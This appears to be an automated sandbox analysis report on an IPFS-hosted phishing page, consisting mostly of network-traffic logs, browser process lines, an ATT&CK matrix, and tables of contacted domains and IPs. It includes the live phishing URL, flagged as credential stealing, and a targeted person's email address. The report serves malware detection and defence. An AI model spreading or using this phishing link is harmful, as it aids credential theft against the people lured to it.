        Source: unknownNetwork traffic detected: HTTP traffic on port 52347 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52377
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52374
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52375
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52378
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52379
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52380
        Source: unknownNetwork traffic detected: HTTP traffic on port 52392 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52383
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52384
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52381
        Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52382
        Source: unknownNetwork traffic detected: HTTP traffic on port 52427 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52398 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52387
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52388
        Source: unknownNetwork traffic detected: HTTP traffic on port 52455 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52385
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52386
        Source: unknownNetwork traffic detected: HTTP traffic on port 52381 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52438 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52342 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52389
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52390
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52391
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52394
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52395
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52392
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52393
        Source: unknownNetwork traffic detected: HTTP traffic on port 52370 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52449 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52336 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52439
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52437
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52438
        Source: unknownNetwork traffic detected: HTTP traffic on port 52397 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52431
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52432
        Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52368 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52430
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52435
        Source: unknownNetwork traffic detected: HTTP traffic on port 52380 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52436
        Source: unknownNetwork traffic detected: HTTP traffic on port 52439 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52345 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52433
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52434
        Source: unknownNetwork traffic detected: HTTP traffic on port 52339 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52451 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52463 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52329
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52327
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52448
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52328
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52449
        Source: unknownNetwork traffic detected: HTTP traffic on port 52379 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52440 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52411 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52442
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52322
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52440
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52441
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52325
        Source: unknownNetwork traffic detected: HTTP traffic on port 52362 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52446
        Source: unknownNetwork traffic detected: HTTP traffic on port 52457 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52326
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52447
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52323
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52444
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52324
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52445
        Source: unknownNetwork traffic detected: HTTP traffic on port 52386 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52422 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52450
        Source: unknownNetwork traffic detected: HTTP traffic on port 52334 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52405 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52351 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52338
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52459
        Source: unknownNetwork traffic detected: HTTP traffic on port 52462 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52339
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52332
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52453
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52333
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52454
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52330
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52451
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52331
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52452
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52336
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52457
        Source: unknownNetwork traffic detected: HTTP traffic on port 52324 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52337
        Source: unknownNetwork traffic detected: HTTP traffic on port 52363 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52456 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52458
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52334
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52455
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52335
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52456
        Source: unknownNetwork traffic detected: HTTP traffic on port 52400 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52340 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52423 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52460
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52340
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52461
        Source: unknownNetwork traffic detected: HTTP traffic on port 52396 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52349
        Source: unknownNetwork traffic detected: HTTP traffic on port 52434 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52343
        Source: unknownNetwork traffic detected: HTTP traffic on port 52346 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52417 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52464
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52344
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52341
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52462
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52342
        Source: unknownNetwork traffic detected: HTTP traffic on port 52385 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52463
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52347
        Source: unknownNetwork traffic detected: HTTP traffic on port 52329 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52345
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52346
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52391 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52350
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52351
        Source: unknownNetwork traffic detected: HTTP traffic on port 52357 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 52374 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52445 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 52412 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52378 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52435 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52384 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52349 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52326 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52361 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52458 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52390 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52429 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52406 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52406
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52407
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52404
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52405
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52408
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52409
        Source: unknownNetwork traffic detected: HTTP traffic on port 52453 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52402
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52403
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52400
        Source: unknownNetwork traffic detected: HTTP traffic on port 52344 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52401
        Source: unknownNetwork traffic detected: HTTP traffic on port 52447 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52401 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52372 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52338 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52355 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52464 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52417
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52418
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52415
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52416
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52419
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52410
        Source: unknownNetwork traffic detected: HTTP traffic on port 52418 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52452 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52413
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52414
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52411
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52412
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52389 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52350 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52356 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52373 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52446 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52333 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52428
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52429
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52426
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52427
        Source: unknownNetwork traffic detected: HTTP traffic on port 52407 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52413 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52420
        Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52421
        Source: unknownNetwork traffic detected: HTTP traffic on port 52325 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52424
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52425
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52422
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52423
        Source: unknownNetwork traffic detected: HTTP traffic on port 52424 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52367 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52395 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52441 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52460 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52322 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52398
        Source: unknownNetwork traffic detected: HTTP traffic on port 52454 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52399
        Source: unknownNetwork traffic detected: HTTP traffic on port 52431 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52396
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52397
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52448 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52425 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52402 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52371 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52394 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52331 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52354 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52436 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52383 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52419 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52327 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52365 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52359 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52443 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52437 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52408 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52414 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52399 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52382 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52343 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52366 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52442 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52337 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52377 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52360 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52459 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52388 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52403 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52420 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52332 -> 443
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:52322 version: TLS 1.2
        Source: classification engineClassification label: mal68.phis.win@21/23@12/8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2076,i,5621221756577242458,7014284374741819107,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2076,i,5621221756577242458,7014284374741819107,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://getbootstrap.com/)0%URL Reputationsafe
        https://cct.google/taggy/agent.js0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        stackpath.bootstrapcdn.com
        104.18.11.207
        truefalse
          unknown
          bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link
          209.94.90.3
          truefalse
            unknown
            d12y7sg0iam4lc.cloudfront.net
            18.65.39.18
            truefalse
              unknown
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                unknown
                www.google.com
                142.250.184.228
                truefalse
                  unknown
                  image.thum.io
                  3.230.32.200
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      unknown
                      s-part-0032.t-0009.t-msedge.net
                      13.107.246.60
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://d12y7sg0iam4lc.cloudfront.net/b1268/s/js/authen.min.jsfalse
                          unknown
                          https://d12y7sg0iam4lc.cloudfront.net/b1268/s/js/mesg_en.jsfalse
                            unknown
                            https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/img/bg-image.jpgtrue
                              unknown
                              https://image.thum.io/get/65490-1671030344805-37a36e07674665dbe1105f1044aab44d/width/1200/https://virtualintelligencebriefing.comfalse
                                unknown
                                https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comtrue
                                  unknown
                                  https://d12y7sg0iam4lc.cloudfront.net/b1268/s/js/pack.min.jsfalse
                                    unknown
                                    https://www.google.com/s2/favicons?domain=virtualintelligencebriefing.comfalse
                                      unknown
                                      https://www.google.com/s2/favicons?domain=false
                                        unknown
                                        https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/true
                                          unknown
                                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.cssfalse
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.google.comchromecache_119.2.dr, chromecache_120.2.drfalse
                                              unknown
                                              https://td.doubleclick.netchromecache_119.2.dr, chromecache_120.2.drfalse
                                                unknown
                                                https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_117.2.drfalse
                                                  unknown
                                                  https://getbootstrap.com/)chromecache_117.2.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://cct.google/taggy/agent.jschromecache_119.2.dr, chromecache_120.2.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  142.250.185.100
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  104.18.11.207
                                                  stackpath.bootstrapcdn.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  18.65.39.18
                                                  d12y7sg0iam4lc.cloudfront.netUnited States
                                                  3MIT-GATEWAYSUSfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  3.230.32.200
                                                  image.thum.ioUnited States
                                                  14618AMAZON-AESUSfalse
                                                  209.94.90.3
                                                  bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.linkUnited States
                                                  40680PROTOCOLUSfalse
                                                  142.250.184.228
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  IP
                                                  192.168.2.4
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1546395
                                                  Start date and time:2024-10-31 20:48:41 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 3m 26s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:browseurl.jbs
                                                  Sample URL:https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:8
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal68.phis.win@21/23@12/8
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 216.58.206.35, 74.125.133.84, 142.250.184.206, 34.104.35.123, 142.250.186.104, 142.250.186.106, 216.58.206.42, 172.217.16.202, 142.250.181.234, 142.250.186.74, 142.250.184.202, 172.217.18.106, 216.58.206.74, 142.250.185.138, 142.250.184.234, 142.250.185.106, 172.217.18.10, 142.250.185.74, 142.250.186.138, 142.250.186.42, 216.58.212.170, 23.215.17.144, 216.58.212.138, 142.250.185.170, 142.250.185.202, 142.250.186.170, 142.250.185.234, 172.217.23.106, 142.250.74.202, 142.250.186.132, 142.250.185.228, 172.202.163.200, 93.184.221.240, 52.165.164.15, 192.229.221.95, 4.245.163.56, 172.217.16.195
